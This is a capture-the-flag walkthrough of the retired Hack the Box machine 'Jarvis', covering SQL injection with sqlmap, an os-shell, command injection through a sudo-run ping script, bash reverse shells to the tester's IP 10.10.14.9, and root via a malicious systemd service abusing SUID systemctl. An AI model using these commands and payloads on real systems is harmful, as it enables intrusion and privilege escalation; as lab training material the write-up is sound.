Hack the Box- Jarvis Walkthrough
This article is a walkthrough for the retired machine “Jarvis” on Hack the Box. This machine has a static IP address of 10.10.10.143. Hack the Box is a website to test your hands-on penetration testing on intentionally vulnerable machines.
Task: find user.txt and root.txt in the victim’s machine.
- Open ports and running services
- Directories enumeration
- Fuzzing to find SQLi
- Exploiting SQLi using SQLmap
- Spawning os-shell in SQLmap
- Getting a meterpreter shell
- Enumerating sudoers file
- Running simpler.py script as user pepper
- Gaining access to user pepper
- Post exploitation using SUID set on systemctl
- Gaining root access
Snagging the root flag
We used the nmap aggressive scan on our target IP 10.10.10.143 and observed that ports 22 and 80 were open.
On moving to the website, we saw a website of some hotel running. The interface was very simple and nothing much could be obtained just by having a look at the source code or even running directory enumeration.
We then tried jumping tabs and testing OWASP Top 10, and luckily, we found SQL injection on the rooms page.
The vulnerable parameter was cod. It was obvious then to run sqlmap on this tamperable URL and see what databases were there on the website.
sqlmap –u http://10.10.10.143/room.php?cod=1 --dbs --batch
We see 4 databases running on the web application server out of which only one database, i.e, hotels seemed interesting.
We couldn’t find much here and there in databases so it made us go another way. There is this option in sqlmap called the “os-shell” that tries and spawns a shell of the webserver.
sqlmap –u http://10.10.1.0.143/room.php?cod=1 --dbs --os-shell --batch
And as expected we landed up with a shell of the server. We confirmed the shell using the command id.
Now we tried to browse to user.txt but the current user didn’t have the permission to read user.txt.
So, we tried to get access to another user but first, we got out of this really slow and weird os-shell interface using a web_delivery payload and getting a session on meterpreter back.
We copied this python command onto the os-shell teletype and got a familiar teletype with us.
While running, we had a need to change the language from python to python3.
Once, we got our meterpreter session, we immediately got into shell mode using shell command. Then spawned a pseudo teletype using python one-liner and finally checked sudoers file to find out a script called simpler.py that had permissions to run as root.
shell python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo -u pepper /var/www/Admin-Utilities/simpler.py
On running the script, we see that it was simply pinging the IP. On further review of the source code, we found out that a simple OS injection wouldn’t have sufficed because all the characters are blacklisted
But we see that $ is not restricted. So, running this script as pepper and running our bash binary inside might give us a shell of the user pepper.
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p $(/bin/bash) ls ls -al id
We tried to run basic commands such as ls, id etc but none of them gave us any output. So, we try to get another shell over netcat using a bash payload
bash -i >& /dev/tcp/10.10.14.9/1234 0>&1
Here, 10.10.14.9 is my IP.
Let’s open a netcat listener on another terminal window. This time, the shell was better and we are able to read the user.txt flag.
Let’s move towards rooting the box.
The first thing that we tried was to find binaries with SUID bit set.
netcat -lvp 1234 cat user.txt find / -perm -u=s -type f 2>/dev/null
We found systemctl had a SUID bit set. It is fairly evident that if we create a .service file, systemctl would run it as root. Let’s create a service file with name raj.service and add a bash binary in it to be run as root so we get a root bash shell.
Here is the code of the service file:
[Unit] Description=hacking articles [Service] Type=simple ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.9/8888 0>&1' [Install] WantedBy=multi-user.target
In this service file, ExecStart command was going to give us a root shell on a netcat reverse listener set up at port 1234. We set up netcat listener and downloaded and this raj.service file in the victim’s system.
wget http://10.10.14.9:8000/raj.service /bin/systemctl enable /home/pepper/raj.service /bin/systemctl start raj
On our listener, we were successfully able to get a reverse shell and voila! We got root.
nc -lvp 8888 cd /root cat root.txt
We snagged the flag and that’s how we got root access to the system. It was a well-balanced lab and there was a lot of new learning. There were no unnecessary exploit development and hence, we’d rate this as intermediate.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. contact here